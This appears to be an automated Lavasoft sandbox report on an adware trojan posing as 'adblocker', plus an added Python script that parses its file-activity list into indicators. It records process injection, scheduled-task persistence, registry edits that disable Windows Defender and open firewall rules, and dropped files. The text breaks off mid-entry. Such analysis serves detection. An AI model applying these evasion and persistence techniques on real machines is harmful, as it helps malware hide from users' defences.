Gen:Variant.Adware.PennyBee.6 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: fe4e0a2705e5b15832079b300c83de5e
SHA1: ba8dccde84f93dd9fcf6f0de672a435172879f83
SHA256: abbe5a0f3bdbc2aa4f5bcbc9047c7a68c4e12dcc9857f7c1af3892aa95b54871
SSDeep: 24576:NYShsisFlQ3IFz7ZimL826AhX5C9vcxIfOm4ue2qgFhX88Fk9qfDdeIZXGa5RMG:bsiAW3Ix7ZiahJC9kxmOmDR7EqLdeIZj
Size: 1541210 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2009-06-07 00:41:54
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:924
taeako.exe:900
taeako.exe:2352
taeako.exe:212
taeako.exe:972
taeako.exe:948
taeako.exe:2980
taeako.exe:2644
taeako.exe:1536
taeako.exe:544
taeako.exe:436
taedko.exe:1988
The Trojan injects its code into the following process(es):
taeako.exe:372
tae3ko.exe:1932
taedko.exe:1604
dag17797.exe:552
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.dll (39329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\utaujte.js (1447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (101002 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\adblocker_installer__1441686123.txt (16441 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (4 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\jquery4toolbar.js (3312 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe (13368 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3kod.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\khkiaff.js (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\TrayIcons\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (569 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6kod.dll (39329 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\utils.exe (9527 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewko.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeadko.bnp (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\khkiaff.js (1856 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\utaujte.js (1447 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewdko.bnp (6584 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\jquery4toolbar.js (3312 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (0 bytes)
The process taeako.exe:212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (574 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (1156 bytes)
The process taeako.exe:372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\Tempo Runner tae3ko.job (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe (1509 bytes)
%WinDir%\Tasks\Tempo Runner tae6ko.job (8112 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (1528 bytes)
%WinDir%\Tasks\Tempo Runner taedko.job (2704 bytes)
%WinDir%\Tasks\Tempo adblocker Runner.job (920 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (3072 bytes)
The Trojan deletes the following file(s):
%WinDir%\Tasks\Tempo Runner tae6ko.job (0 bytes)
%WinDir%\Tasks\Tempo Runner tae3ko.job (0 bytes)
%WinDir%\Tasks\Tempo Runner taedko.job (0 bytes)
%WinDir%\Tasks\Tempo adblocker Runner.job (0 bytes)
The process taedko.exe:1604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\lgv[1].js (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cmp_ext[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\obbgint[1].js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58 (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ammbg[1].js (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6 (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cxeappconf[1].js (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\getcc[1].php (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8 (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\v1[1].htm (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ammapp[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_gb (32 bytes)
The process taedko.exe:1988 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\loader[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_expire (13 bytes)
The process dag17797.exe:552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\SecondResult.txt (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_422.html (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsDialogs.dll (9 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd4.tmp (0 bytes)
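The file listing above is easier to act on as structured indicators than by eye. Three artefact classes stand out: the machine-wide install directory IlejwTivc under All Users\Application Data (the XP equivalent of ProgramData), the per-run %Temp%\ns<x>.tmp directories (nsk3.tmp, nsp2.tmp, nsz1.tmp, nsd5.tmp) into which an NSIS installer extracts its plugin DLLs (System.dll, nsDialogs.dll, StdUtils.dll, UserInfo.dll, nsisunz.dll are standard NSIS plugins) and deletes them again, and the Task Scheduler 1.0 .job files under %WinDir%\Tasks, which taeako.exe:372 both writes and deletes within its own block. The Python below is an added example and is not part of the Lavasoft report or of the analyzed sample; it parses an excerpt of the report (copied from above and cut down as constructed sample input), tags each written path, and lists what each process wrote and then removed. The tag names, the classification rules and the regular expressions are my own assumptions, not a format the report defines.

```python
import re

# Constructed excerpt of the report's "File activity" section: the lines are
# copied from the report above and cut down to a handful of entries.
REPORT_EXCERPT = r"""
The process %original file name%.exe:924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe (8560 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (0 bytes)
The process taeako.exe:372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\Tempo Runner tae3ko.job (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe (1509 bytes)
The Trojan deletes the following file(s):
%WinDir%\Tasks\Tempo Runner tae3ko.job (0 bytes)
"""

PROCESS_RE = re.compile(r"^The process (?P<name>.+):(?P<pid>\d+) makes changes in the file system\.$")
CREATE_RE = re.compile(r"^The Trojan creates and/or writes to the following file\(s\):$")
DELETE_RE = re.compile(r"^The Trojan deletes the following file\(s\):$")
ENTRY_RE = re.compile(r"^(?P<path>.+) \((?P<size>\d+) bytes\)$")
# NSIS extracts its plugin DLLs into a per-run %Temp%\ns<x>.tmp directory ($PLUGINSDIR).
NSIS_DIR_RE = re.compile(r"\\temp\\ns[a-z0-9]+\.tmp(\\|$)")


def parse_file_activity(text):
    """Map (process name, pid) -> {"created": [(path, size)], "deleted": [path]}."""
    activity, current, mode = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = PROCESS_RE.match(line)
        if m:
            current = (m["name"], int(m["pid"]))
            activity[current] = {"created": [], "deleted": []}
            mode = None
            continue
        if CREATE_RE.match(line):
            mode = "created"
            continue
        if DELETE_RE.match(line):
            mode = "deleted"
            continue
        m = ENTRY_RE.match(line)
        if m and current and mode == "created":
            activity[current]["created"].append((m["path"], int(m["size"])))
        elif m and current and mode == "deleted":
            activity[current]["deleted"].append(m["path"])
    return activity


def classify(path):
    """Tag a path with the artefact classes an analyst triages first (heuristics, assumed)."""
    p = path.lower()
    tags = []
    if p.startswith("%windir%\\tasks\\") and p.endswith(".job"):
        tags.append("scheduled-task")          # Task Scheduler 1.0 job file
    if "\\all users\\application data\\" in p:
        tags.append("programdata-install")     # machine-wide data directory on XP
    if NSIS_DIR_RE.search(p):
        tags.append("nsis-plugin-dir")         # transient installer staging
    if p.endswith((".exe", ".dll")):
        tags.append("executable")
    return tags


def transient_paths(activity):
    """Paths a process both wrote and deleted in its own block (staged, then cleaned up)."""
    out = {}
    for proc, rec in activity.items():
        gone = {path for path, _ in rec["created"]} & set(rec["deleted"])
        if gone:
            out[proc] = sorted(gone)
    return out


def indicators(activity):
    """Deduplicated {path: tags} for every written path that earned at least one tag."""
    ioc = {}
    for rec in activity.values():
        for path, _ in rec["created"]:
            tags = classify(path)
            if tags:
                ioc[path] = tags
    return ioc


if __name__ == "__main__":
    act = parse_file_activity(REPORT_EXCERPT)
    for proc, paths in transient_paths(act).items():
        print("%s:%d wrote then deleted: %s" % (proc[0], proc[1], paths))
    for path, tags in indicators(act).items():
        print("%-40s %s" % (", ".join(tags), path))
```

Run against the full report text the same way; a path that shows up only under "deletes" (nsz1.tmp, nsd4.tmp) is a write the sandbox did not log, so keep the deleted lists as well when hunting on a live host.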
Registry activity
The process %original file name%.exe:924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"Publisher" = "adblocker"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\fe4e0a2705e5b15832079b300c83de5e\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayVersion" = "1.1.0.31"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"SetupType" = "71070"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayIcon" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayName" = "adblocker"
"UninstallString" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe /ga=1503 /ai=121 /bi=0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 9F 63 AB DB 79 36 DA 6C 40 E6 3A F2 0F 8F B5"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\fe4e0a2705e5b15832079b300c83de5e\DEBUG]
"Trace Level"
The process taeako.exe:900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 37 C8 BF 8A 63 02 AF 3F D8 06 6E 13 2C 9C 27"
The process taeako.exe:2352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 13 E6 58 A6 E0 D4 77 FB 5D 8E 1E C5 21 CF AA"
The process taeako.exe:212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\taeako\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"InstallDate" = "140526"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{661088FE-EBD0-4612-8C1E-C282158A658C}" = "v2.10|Action=Allow|Active=TRUE|Dir=In|App=%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe|Name=odufaik|"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 4B D6 B5 AE 9F B4 F3 2E 8A C5 85 0C 1A FD 33"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{661088FE-EBD0-4612-8C1E-C282158A658C}" = "v2.10|Action=Allow|Active=TRUE|Dir=In|App=%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe|Name=odufaik|"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan adds the executable it runs from to the list of authorized Windows Firewall applications for the domain profile:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\IlejwTivc]
"taeako.exe" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe:*:Enabled:odufaik"
It adds the same entry for the standard profile, so the executable is allowed any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\IlejwTivc]
"taeako.exe" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe:*:Enabled:odufaik"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\taeako\DEBUG]
"Trace Level"
The process taeako.exe:972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 38 B2 83 50 39 6E C0 71 A4 69 D3 07 67 CE 28"
The process taeako.exe:948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 7B C0 15 9B 16 8B 6E 90 07 D7 4A 29 ED 3A AF"
The process taeako.exe:2980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 3F 72 81 8B 2A B7 25 C3 9B 28 0C A7 2E 9E 33"
The process taeako.exe:2644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB BF 99 9A 97 CA 44 28 A6 55 D2 69 96 B0 02 7C"
The process taeako.exe:1536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 74 BF C4 76 F0 2C DA 5B 97 7A 2B 1F 99 0F 21"
The process taeako.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 6D 06 43 63 FE 46 50 E7 CA FD 00 67 AD E6 CD"
The process taeako.exe:436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
